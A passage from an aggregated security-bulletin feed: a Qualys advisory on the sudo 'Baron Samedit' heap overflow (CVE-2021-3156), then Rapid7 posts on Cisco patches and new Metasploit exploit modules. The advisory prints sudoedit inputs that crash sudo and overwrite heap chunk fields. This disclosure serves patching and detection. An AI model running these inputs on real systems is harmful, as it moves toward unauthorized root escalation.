Sudo&#x27;s MODE_SHELL flag; OR\n * through the -i option, which sets Sudo&#x27;s MODE_SHELL and MODE_LOGIN_SHELL flags; then, at the beginning of Sudo&#x27;s main(), parse_args() rewrites argv (lines 609-617), by concatenating all command-line arguments (lines 587-595) and by escaping all meta-characters with backslashes (lines 590-591):\n \n \n -------------------------------------------------------------------- \n 571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n 572 char **av, *cmnd = NULL; \n 573 int ac = 1; \n ... \n 581 cmnd = dst = reallocarray(NULL, cmnd_size, 2); \n ... \n 587 for (av = argv; *av != NULL; av++) { \n 588 for (src = *av; *src != '\\0'; src++) { \n 589 /* quote potential meta characters */ \n 590 if (!isalnum((unsigned char)*src) && *src != '_' && *src != '-' && *src != '$') \n 591 *dst++ = '\\\\'; \n 592 *dst++ = *src; \n 593 } \n 594 *dst++ = ' '; \n 595 } \n ... \n 600 ac += 2; /* -c cmnd */ \n ... \n 603 av = reallocarray(NULL, ac + 1, sizeof(char *)); \n ... \n 609 av[0] = (char *)user_details.shell; /* plugin may override shell */ \n 610 if (cmnd != NULL) { \n 611 av[1] = \"-c\"; \n 612 av[2] = cmnd; \n 613 } \n 614 av[ac] = NULL; \n 615 \n 616 argv = av; \n 617 argc = ac; \n 618 } \n --------------------------------------------------------------------- \n\nLater, in sudoers_policy_main(), set_cmnd() concatenates the command-line arguments into a heap-based buffer &quot;user_args&quot; (lines 864-871) and unescapes the meta-characters (lines 866-867), &quot;for sudoers matching and logging purposes&quot;:\n \n \n -------------------------------------------------------------- \n 819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n ... \n 852 for (size = 0, av = NewArgv + 1; *av; av++) \n 853 size += strlen(*av) + 1; \n 854 if (size == 0 || (user_args = malloc(size)) == NULL) { \n ... \n 857 } \n 858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n ... \n 864 for (to = user_args, av = NewArgv + 1; (from = *av); av++) { \n 865 while (*from) { \n 866 if (from[0] == '\\\\' && !isspace((unsigned char)from[1])) \n 867 from++; \n 868 *to++ = *from++; \n 869 } \n 870 *to++ = ' '; \n 871 } \n ... \n 884 } \n ... \n 886 } \n --------------------------------------------------------------------- \n\nUnfortunately, if a command-line argument ends with a single backslash character, then:\n\n * at line 866, &quot;from[0]&quot; is the backslash character, and &quot;from[1]&quot; is the argument&#x27;s null terminator (i.e., not a space character);\n * at line 867, &quot;from&quot; is incremented and points to the null terminator;\n * at line 868, the null terminator is copied to the &quot;user_args&quot; buffer, and &quot;from&quot; is incremented again and points to the first character after the null terminator (i.e., out of the argument&#x27;s bounds);\n * the &quot;while&quot; loop at lines 865-869 reads and copies out-of-bounds characters to the &quot;user_args&quot; buffer.\n\nIn other words, set_cmnd() is vulnerable to a heap-based buffer overflow, because the out-of-bounds characters that are copied to the &quot;user_args&quot; buffer were not included in its size (calculated at lines852-853).\n\nIn theory, however, no command-line argument can end with a single backslash character: if MODE_SHELL or MODE_LOGIN_SHELL is set (line 858, a necessary condition for reaching the vulnerable code), then MODE_SHELL is set (line 571) and parse_args() already escaped all meta-characters, including backslashes (i.e., it escaped every single backslash with a second backslash).\n\nIn practice, however, the vulnerable code in set_cmnd() and the escape code in parse_args() are surrounded by slightly different conditions:\n \n \n --------------------------------------------------------------------- \n 819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n ... \n 858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n --------------------------------------------------------------------- \n\nversus:\n \n \n --------------------------------------------------------------------- \n 571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n --------------------------------------------------------------------- \n\nOur question is: can we set MODE_SHELL and either MODE_EDIT or MODE_CHECK (to reach the vulnerable code) but not the default MODE_RUN (to avoid the escape code)?\n\nThe answer, it seems, is no: if we set MODE_EDIT (-e option, line 361) or MODE_CHECK (-l option, lines 423 and 519), then parse_args() removes MODE_SHELL from the &quot;valid_flags&quot; (lines 363 and 424) and exits with an error if we specify an invalid flag such as MODE_SHELL (lines 532-533):\n \n \n --------------------------------------------------------------------- \n 358 case 'e': \n ... \n 361 mode = MODE_EDIT; \n 362 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n 363 valid_flags = MODE_NONINTERACTIVE; \n 364 break; \n ... \n 416 case 'l': \n ... \n 423 mode = MODE_LIST; \n 424 valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST; \n 425 break; \n ... \n 518 if (argc > 0 && mode == MODE_LIST) \n 519 mode = MODE_CHECK; \n ... \n 532 if ((flags & valid_flags) != flags) \n 533 usage(1); \n --------------------------------------------------------------------- \n\nBut we found a loophole: if we execute Sudo as &quot;sudoedit&quot; instead of &quot;sudo&quot;, then parse_args() automatically sets MODE_EDIT (line 270) but does not reset &quot;valid_flags&quot;, and the &quot;valid_flags&quot; include MODE_SHELL by default (lines 127 and 249):\n \n \n --------------------------------------------------------------------- \n 127 #define DEFAULT_VALID_FLAGS (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL) \n ... \n 249 int valid_flags = DEFAULT_VALID_FLAGS; \n ... \n 267 proglen = strlen(progname); \n 268 if (proglen > 4 && strcmp(progname + proglen - 4, \"edit\") == 0) { \n 269 progname = \"sudoedit\"; \n 270 mode = MODE_EDIT; \n 271 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n 272 } \n ------------------------------------------------------------------------ \n\nConsequently, if we execute &quot;sudoedit -s&quot;, then we set both MODE_EDIT and MODE_SHELL (but not MODE_RUN), we avoid the escape code, reach the vulnerable code, and overflow the heap-based buffer &quot;user_args&quot; through a command-line argument that ends with a single backslash character:\n \n \n --------------------------------------------------------------------- \n sudoedit -s '\\' `perl -e 'print \"A\" x 65536'` \n malloc(): corrupted top size \n Aborted (core dumped) \n ---------------------------------------------------------------------\n\nFrom an attacker&#x27;s point of view, this buffer overflow is ideal due to following reasons:\n\n1) The attacker controls the size of the &quot;user_args&quot; buffer that can be overflowed (the size of our concatenated command-line arguments, at lines 852-854);\n\n2) The attacker independently controls the size and contents of the overflow itself (our last command-line argument is conveniently followed by our first environment variables, which are not included in the size calculation at lines 852-853);\n\n3) The attacker can even write null bytes to the buffer that was overflowed (every command-line argument or environment variable that ends with a single backslash writes a null byte to &quot;user_args&quot;, at lines 866-868).\n\nFor example, on an amd64 Linux, the following command allocates a 24-byte &quot;user_args&quot; buffer (a 32-byte heap chunk) and overwrites the next chunk&#x27;s size field with &quot;A=a\\0B=b\\0&quot; (0x00623d4200613d41), its fd field with &quot;C=c\\0D=d\\0&quot; (0x00643d4400633d43), and its bk field with &quot;E=e\\0F=f\\0&quot; (0x00663d4600653d45):\n \n \n --------------------------------------------------------------------- \n env -i 'AA=a\\' 'B=b\\' 'C=c\\' 'D=d\\' 'E=e\\' 'F=f' sudoedit -s '1234567890123456789012\\' \n --------------------------------------------------------------------- \n \n --|--------+--------+--------+--------|--------+--------+--------+--------+-- \n | | |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.| \n --|--------+--------+--------+--------|--------+--------+--------+--------+-- \n \n size <---- user_args buffer ----> size fd bk \n\n### Solution\n\nGiven the breadth of the attack surface for this vulnerability, Qualys recommends users apply patches for this vulnerability immediately. \n\nQualys customers can search the vulnerability knowledgebase for CVE-2021-3156 to identify all the QIDs and assets vulnerable for this vulnerability.\n\nIf you are not a customer, start your free [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to get full access to the QIDs (detections) for CVE-2021-3156, so you can identify your vulnerable assets.\n\n### Qualys Coverage\n\nQualys is releasing the QIDs in the table below as they become available starting with vulnsigs version VULNSIGS-2.5.90-4 and in Linux Cloud Agent manifest version lx_manifest-2.5.90.4-3.\n\n**QID** | **Title** | **O/S** | **Advisory** | **Version*** \n---|---|---|---|--- \n352207 | Amazon Linux Security Advisory for sudo: ALAS2-2021-1590 (Baron Samedit)) | Amazon Linux | [ALAS2-2021-1590 ](<https://alas.aws.amazon.com/AL2/ALAS-2021-1590.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n352208 | Amazon Linux Security Advisory for sudo: ALAS-2021-1478 (Baron Samedit) | Amazon Linux | [ALAS-2021-1478](<https://alas.aws.amazon.com/ALAS-2021-1478.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174570 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0226-1) (Baron Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0226-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008249.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174571 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0227-1) (Baron Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0227-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008250.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174572 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0225-1) (Baron Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0225-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008251.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n178379 | Debian Security Update for sudo (DSA 4839-1) (Baron Samedit) | Debian | [DSA 4839-1](<https://lists.debian.org/debian-security-announce/2021/msg00020.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n198231 | Ubuntu Security Notification for Sudo Vulnerabilities : USN-4705-1(Baron Samedit) | Ubuntu | [USN-4705-1](<https://usn.ubuntu.com/4705-1/>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n374915 | Gentoo Linux Sudo Multiple Vulnerabilities (GLSA 202101-33) (Baron Samedit) | Gentoo | [GLSA 202101-33](<https://security.gentoo.org/glsa/202101-33>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n158992 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-0221)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-0221](<https://linux.oracle.com/errata/ELSA-2021-0221.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n158993 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-0218)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-0218](<https://linux.oracle.com/errata/ELSA-2021-0218.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n158994 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-9019)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-9019](<https://linux.oracle.com/errata/ELSA-2021-9019.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n178383 | Debian Security Update for sudo (DLA 2534-1) (Baron Samedit) | Debian | [DLA 2534-1](<https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239026 | Red Hat Update for sudo (RHSA-2021:0218) (Baron Samedit) | Red Hat | [RHSA-2021:0218](<https://access.redhat.com/errata/RHSA-2021:0218?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239027 | Red Hat Update for sudo (RHSA-2021:0219) (Baron Samedit) | Red Hat | [RHSA-2021:0219](<https://access.redhat.com/errata/RHSA-2021:0219?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239028 | Red Hat Update for sudo (RHSA-2021:0220) (Baron Samedit) | Red Hat | [RHSA-2021:0220](<https://access.redhat.com/errata/RHSA-2021:0220?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239029 | Red Hat Update for sudo (RHSA-2021:0221) (Baron Samedit) | Red Hat | [RHSA-2021:0221](<https://access.redhat.com/errata/RHSA-2021:0221?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239030 | Red Hat Update for sudo (RHSA-2021:0222) (Baron Samedit) | Red Hat | [RHSA-2021:0222](<https://access.redhat.com/errata/RHSA-2021:0222?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239031 | Red Hat Update for sudo (RHSA-2021:0223) (Baron Samedit) | Red Hat | [RHSA-2021:0223](<https://access.redhat.com/errata/RHSA-2021:0223?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239032 | Red Hat Update for sudo (RHSA-2021:0227) (Baron Samedit) | Red Hat | [RHSA-2021:0227](<https://access.redhat.com/errata/RHSA-2021:0227?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n257056 | CentOS Security Update for sudo Security Update (CESA-2021:0221) (Baron Samedit) | CentOS | [CESA-2021:0221](<https://lists.centos.org/pipermail/centos-announce/2021-January/048252.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n280866 | Fedora Security Update for sudo (FEDORA-2021-8840cbdccd) (Baron Samedit) | Fedora | [FEDORA-2021-8840cbdccd](<https://bodhi.fedoraproject.org/updates/FEDORA-2021-8840cbdccd>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n280868 | Fedora Security Update for sudo (FEDORA-2021-2cb63d912a) (Baron Samedit) | Fedora | [FEDORA-2021-2cb63d912a](<https://bodhi.fedoraproject.org/updates/FEDORA-2021-2cb63d912a>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n352217 | Amazon Linux Security Advisory for sudo: AL2012-2021-335 (Baron Samedit) | Amazon Linux | AL2012-2021-335 | VULNSIGS-2.5.95-2 / 2.5.95.2-1 \n374891 | Sudo Heap-based Buffer Overflow Vulnerability (Baron Samedit) | Local | [Sudo Security Alerts](<https://www.sudo.ws/alerts/unescape_overflow.html>) | VULNSIGS-2.5.90-4 / 2.5.90.4-3 \n \n* Version is the signature version followed by the Linux manifest version.\n\n### Dashboard\n\nWith VMDR Dashboard, you can track this vulnerability, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the \u201cBaron Samedit | Heap-based buffer overflow Sudo\u201d Dashboard.\n\nView and download [the Baron Samedit dashboard](<https://qualys-secure.force.com/customer/s/article/000006518>).\n\nBaron Samedit dashboard\n\n### Vendor References\n\n * [Baron Samedit Security Advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>) ([All Qualys Security Advisories](<https://www.qualys.com/research/security-advisories/>))\n * [Sudo Alert for Baron Samedit](<https://www.sudo.ws/alerts/unescape_overflow.html>) ([All Sudo Security Alerts](<https://www.sudo.ws/security.html>))\n\n### Frequently Asked Questions (FAQs)\n\n###### What versions are vulnerable?\n\nThe following versions of sudo are vulnerable:\n\n * All legacy versions from 1.8.2 to 1.8.31p2\n * All stable versions from 1.9.0 to 1.9.5p1\n\n###### How can I test if I have vulnerable version?\n\nTo test if a system is vulnerable or not, login to the system as a non-root user.\n\nRun command &quot;sudoedit -s /&quot;\n\nIf the system is vulnerable, it will respond with an error that starts with &quot;sudoedit:&quot;\n\nIf the system is patched, it will respond with an error that starts with &quot;usage:&quot;\n\n###### Are versions before 1.8.2 vulnerable?\n\nNo. See explanation above.\n\n###### I&#x27;m running a vulnerable version of sudo from the list mentioned above. Why does the test show my host is not vulnerable?\n\nOperating system vendors don&#x27;t always update the software&#x27;s version number after introducing a patch to the software, particularly when they backport the patch. For example, Ubuntu released a patch (USN-4705-1) for Ubuntu 20.04, but the patched version is still 1.8.31 after the patch is installed.\n\n###### Why am I seeing multiple QIDs for the same CVE-2021-3156 on the same host?\n\nQualys released a generic QID at the time of release which detected the vulnerability based on the output of the command `sudoedit`. Later on, as OS vendors released patches, we released QIDs based on package versions as well. So, it is possible for a vulnerable asset to have the vulnerability reported for QID 374891, and OS specific checks that were released later on.\n\n###### What are the possible reasons for QID 374891 not triggering against vulnerable systems?\n\nQID 374891 was released with vulnsigs version VULNSIGS-2.5.90-4 and in Linux Cloud Agent manifest version lx_manifest-2.5.90.4-3. For the vulnerabilities to be reported these signature and manifest versions need to be available on the platform (the deployment schedule varies), and agents have completed a scan with the latest versions of the signatures.\n\nAlso, Qualys released more QIDs based on the security advisories and patches released by various Linux distributions. So certain Linux distributions had coverage before the rest. For e.g., Amazon Linux security advisory was released first, and CentOS advisories, and patches were released couple of days later. Support for CentOS linux was added to later versions vulnsigs and manifests. See table above for details.\n\n###### For CVE-2021-3156, what is the difference in the detection logic between QID 374891 and the rest of the QIDs?\n\nQID 374891 attempts to confirm the vulnerability based on output of command `sudoedit`. The rest of the QIDs confirm the vulnerability based on version comparison based on the versions disclosed by the OS vendor in their respective security advisories.\n\n###### Is a local user required to exploit the vulnerability?\n\nYes. However, this user does not need to be a privileged user or be a part of sudoers list. For example, even account \u2018nobody\u2019 can exploit the issue.\n\n###### Why name the vulnerability \u201cBaron Samedit\u201d?\n\nIt\u2019s a play on Baron Samedi and sudoedit.\n\n###### Will Qualys Research Team publish exploit code for this vulnerability? \n\nNo**.**", "modified": "2021-01-26T18:09:09", "published": "2021-01-26T18:09:09", "id": "QUALYSBLOG:A341C9278C6DD389E0F263AE83CB5579", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T01:46:45", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "\n\nWhile [Punxsutawney Phil may have said we only have six more weeks of winter](<https://www.groundhog.org/>), the need to patch software and hardware weaknesses will, unfortunately, never end.\n\nCisco has released security updates to address vulnerabilities in most of their product portfolio, some of which may be exploited to gain full system/device control on certain devices, and one fixes the [recently disclosed sudo input validation vulnerability](<https://www.sudo.ws/alerts/unescape_overflow.html>). We discuss this vulnerability below, but there are many more lower-severity, or \u201cvalid administrator credentials-required\u201d bugs on the Cisco [Security Advisories page](<https://tools.cisco.com/security/center/publicationListing.x>) that all organizations who use Cisco products should review.\n\n## Getting back to RBAC\n\n\n\nThe \u201csudo\u201d advisory is officially presented as \u201c[Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM>)\u201d and affects pretty much every Cisco product that has a command line interface. It is a fix for the ubiquitous [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit>) general `sudo` weakness.\n\nAccording to the advisory, the vulnerability is due to \u201cimproper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the `sudoedit` command with crafted parameters or by executing a binary exploit.\u201d\n\nAll commands invoked after exploiting this vulnerability will have `root` privileges.\n\nThis weakness will also enable lower-privileged users with access to Cisco devices to elevate their privileges, meaning you _technically_ are out of compliance with any role-based access control requirement (which is in virtually every modern cybersecurity compliance framework).\n\nRapid7 strongly advises organizations to patch this weakness as soon as possible to stop attackers and curious users from taking control of your network, as well as ensuring you are able to continue checking \u2705 this particular compliance box. Even though we mentioned it at the top of the post, don\u2019t forget to check out the rest of [the Cisco security advisories](<https://tools.cisco.com/security/center/publicationListing.x>) to see whether you need to address weaknesses in any of your other Cisco devices.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-02-04T21:04:49", "published": "2021-02-04T21:04:49", "id": "RAPID7BLOG:B7BFF90DF2218C3CFB5ABB1CFE63700E", "href": "https://blog.rapid7.com/2021/02/04/cisco-patches-recently-disclosed-sudo-vulnerability-cve-2021-3156-in-multiple-products/", "type": "rapid7blog", "title": "Cisco Patches Recently Disclosed \"sudo\" Vulnerability (CVE-2021-3156) in Multiple Products", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "## Baron Samedit is coming to get you\n\n\n\nLast week, a critical [bug](<https://www.sudo.ws/alerts/unescape_overflow.html>) in `sudo` came out and could potentially affect most of the Linux-based operating systems, since this tool is usually installed by default. This vulnerability is identified as [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog#rapid7-analysis>), but better known as &quot;Baron Samedit&quot;, and is sitting there in the code since July 2011, ready to guide you to the underworld. It affects [legacy](<https://www.sudo.ws/legacy.html>) versions from 1.8.2 to 1.8.31p2 and [stable](<https://www.sudo.ws/stable.html>) versions from 1.9.0 to 1.9.5p1. If you have not done it already, **patch now!**\n\nThis week, our own [Spencer McIntyre](<https://github.com/zeroSteiner>) added a new [module](<https://github.com/rapid7/metasploit-framework/pull/14715>) that leverages this vulnerability to gain root privileges from any local user without using a password. This exploit is based on the [blasty](<https://github.com/blasty>) [PoC](<https://github.com/blasty/CVE-2021-3156/blob/main/hax.c>). It requires specific offsets to succeed, and currently has targets for Ubuntu 20.04 and 18.0[1-4]. We would like to extend that target list, and help from our awesome community would be greatly appreciated!\n\n## OneDrive to rule them all\n\nContributor [@stufus](<https://github.com/stufus>) added a very useful [module](<https://github.com/rapid7/metasploit-framework/pull/14593>) that enumerates the Microsoft 365 Sharepoint/OneDrive endpoints on a target Windows system. This allows access to information related to sites that are being synchronised by the OneDrive application. This module will be very useful to get sensitive and extra information during a pentest engagement.\n\n## New Modules (3)\n\n * [Abandoned Cart for WooCommerce SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14578>) by WPDeeply and h00die: This adds an auxiliary module that retrieves Wordpress user names and password hashes by leveraging an unauthenticated SQL injection vulnerability within the WooCommerce Abandoned Cart plugin for versions below 5.8.2.\n * [Sudo Heap-Based Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/14715>) by Alexander Krog, Qualys, Spencer McIntyre, blasty, and bwatters-r7, which exploits [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>): This adds an initial exploit for CVE-2021-3156 which is a heap-based buffer overflow in the sudo utility which came out recently.\n * [OneDrive Sync Provider Enumeration Module](<https://github.com/rapid7/metasploit-framework/pull/14593>) by Stuart Morgan: A new module, `post/windows/gather/enum_onedrive.rb`, has been added which allows users to enumerate information relating to all of the sites (including teamsites) which OneDrive is configured to synchronize for a target host.\n\n## Enhancements and features\n\n * [#14713](<https://github.com/rapid7/metasploit-framework/pull/14713>) from [yogeshwarram](<https://github.com/yogeshwarram>) adds documentation for the `auxiliary/scanner/redis/redis_login` module.\n\n## Bugs Fixed\n\n * [#14680](<https://github.com/rapid7/metasploit-framework/pull/14680>) from [digininja](<https://github.com/digininja>) prevents `exploit/windows/winrm/winrm_script_exec` printing `nil` when no command output is returned.\n * [#14684](<https://github.com/rapid7/metasploit-framework/pull/14684>) from [adfoster-r7](<https://github.com/adfoster-r7>) adds formatted logging to external python modules.\n * [#14690](<https://github.com/rapid7/metasploit-framework/pull/14690>) from [timwr](<https://github.com/timwr>) updates the Mettle payloads gem to 1.0.6, which [includes a fix](<https://github.com/rapid7/mettle/pull/207>) for a segmentation fault leading to the Meterpreter session crashing.\n * [#14693](<https://github.com/rapid7/metasploit-framework/pull/14693>) from [dwelch-r7](<https://github.com/dwelch-r7>) fixes a regression error introduced in Metasploit 6.0.27 which caused the vhost header to not be correctly set for http modules\n * [#14719](<https://github.com/rapid7/metasploit-framework/pull/14719>) from [acammack-r7](<https://github.com/acammack-r7>) pivoted connections are now much less likely to close early when there is still data pending to be read or written\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.28...6.0.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-28T13%3A25%3A20-06%3A00..2021-02-04T11%3A13%3A25-06%3A00%22>)\n * [Full diff 6.0.28...6.0.29](<https://github.com/rapid7/metasploit-framework/compare/6.0.28...6.0.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-05T19:30:43", "published": "2021-02-05T19:30:43", "id": "RAPID7BLOG:BCCD03F6B72FD7F9410FC063D6F16682", "href": "https://blog.rapid7.com/2021/02/05/metasploit-wrap-up-97/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-12T20:56:10", "bulletinFamily": "info", "cvelist": ["CVE-2020-11853", "CVE-2020-16875", "CVE-2020-17132", "CVE-2021-3156"], "description": "## MicroFocus? More like MacroVuln\n\n\n\nMicroFocus\u2019s Operations Bridge Manager is a security information and event management (SIEM) tool designed to collect and parse security logs from multiple disparate sources. OBM has a large attack surface\u2014something [Pedro Ribeiro](<https://github.com/pedrib>) was able to take advantage of with his new [RCE module](<https://github.com/rapid7/metasploit-framework/pull/14671>). This module leverages a Java deserialization bug to allow payload execution as either root or SYSTEM, depending on the victim OS.\n\nWe've one other OBM module currently in the process of being landed, but for anyone who needs their fix of MicroFocus hacks right away, we'd recommend pedrib\u2019s [super detailed writeup](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md>) of his findings.\n\n## Patches? We don't need no stinkin' patches!\n\nWhile [PR #14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) doesn\u2019t add a totally new exploit for Microsoft Exchange Server, that's only because [zeroSteiner](<https://github.com/zeroSteiner>) was able to update an earlier module to support a bypass for the patch that was _supposed_ to fix the vuln it exploited.\n\n[CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>) originally allowed remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server so long as they were authenticated as a user who had an active mailbox and who was assigned the `Data Loss Prevention` role. This was believed to have been patched in the [Exchange Server 2016 Cumulative Update 18](<https://support.microsoft.com/en-us/topic/cumulative-update-18-for-exchange-server-2016-c1af0ead-3bde-e4db-5f24-9f597050dcbf>) (September 15 2020) and [Exchange Server 2019 Cumulative Update 7](<https://support.microsoft.com/en-us/topic/cumulative-update-7-for-exchange-server-2019-b763863a-8a2f-9eb9-f3cc-4c4098e0e413>) (September 15 2020). However, this patch was later bypassed and assigned [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132?referrer=blog>). Microsoft\u2019s second patch was also later bypassed\u2014a tough shake for organizations\u2019 patch cycles. Both the [original vulnerability](<https://srcincite.io/advisories/src-2020-0019/>) and [the patch bypass](<https://srcincite.io/advisories/src-2020-0032/>)) were discovered by [Steven Seeley](<https://twitter.com/steventseeley/status/1349058761370071041>), and the Metasploit code is based on his work.\n\nzeroSteiner's changes allow the `exchange_ecp_dlp_policy` module to exploit the two patched versions of Exchange Server and the unpatched server.\n\n## External modules, internal quality\n\nLast but not least, [cgranleese-r7](<https://github.com/cgranleese-r7>) has spearheaded our efforts to improve usability of [Metasploit\u2019s external modules](<https://blog.rapid7.com/2018/09/05/external-metasploit-modules-the-gift-that-keeps-on-slithering/>) by providing more informative error messages for users when they lack the required languages in their environment ([#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>)). This will help avoid instances of users missing out on useful modules due to their not knowing some languages outside of ruby can be needed for the full metasploit experience.\n\n> msf6 &gt; use auxiliary/scanner/msmail/host_id \n[-] Failed to load module: LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment. \nmsf6 &gt;\n\n## New modules (1)\n\n * [Micro Focus Operations Bridge Manager Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14671>) by Pedro Ribeiro, which exploits ZDI-20-1327 / [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>) This adds an exploit module that leverages an insecure Java deserialization vulnerability in multiple Micro Focus products. This allows remote code execution as the root user on Linux or the SYSTEM user on Windows. Initial authentication is required, but any low-privileged user can be used to successfully run this exploit.\n\n## Enhancements and features\n\n * [#14154](<https://github.com/rapid7/metasploit-framework/pull/14154>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) This ensures that all modules that previously used manual `AutoCheck` behavior now leverage the `AutoCheck` mixin instead.\n * [#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Improves the handling of external modules when they're missing runtime dependencies and gives the user a more useful error. It will now return which runtime language the user is missing on their environment (this has been implemented for both Python and Go).\n * [#14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) from [zeroSteiner](<https://github.com/zeroSteiner>) This updates the Exchange ECP DLP Policy module exploit to leverage a new technique that bypasses the original patch. This new technique also works on unpatched versions.\n * [#14669](<https://github.com/rapid7/metasploit-framework/pull/14669>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves error message feedback when using the `auxiliary/analyze/crack_*` modules. Examples include notifying the user that the database needs to be active, and having JohnTheRipper Jumbo patch installed\n * [#14685](<https://github.com/rapid7/metasploit-framework/pull/14685>) from [geyslan](<https://github.com/geyslan>) Reduced the size of the `linux/x64/shell_bind_tcp_random_port` payload while maintaining the functionality.\n * [#14708](<https://github.com/rapid7/metasploit-framework/pull/14708>) from [timwr](<https://github.com/timwr>) Add offsets to the 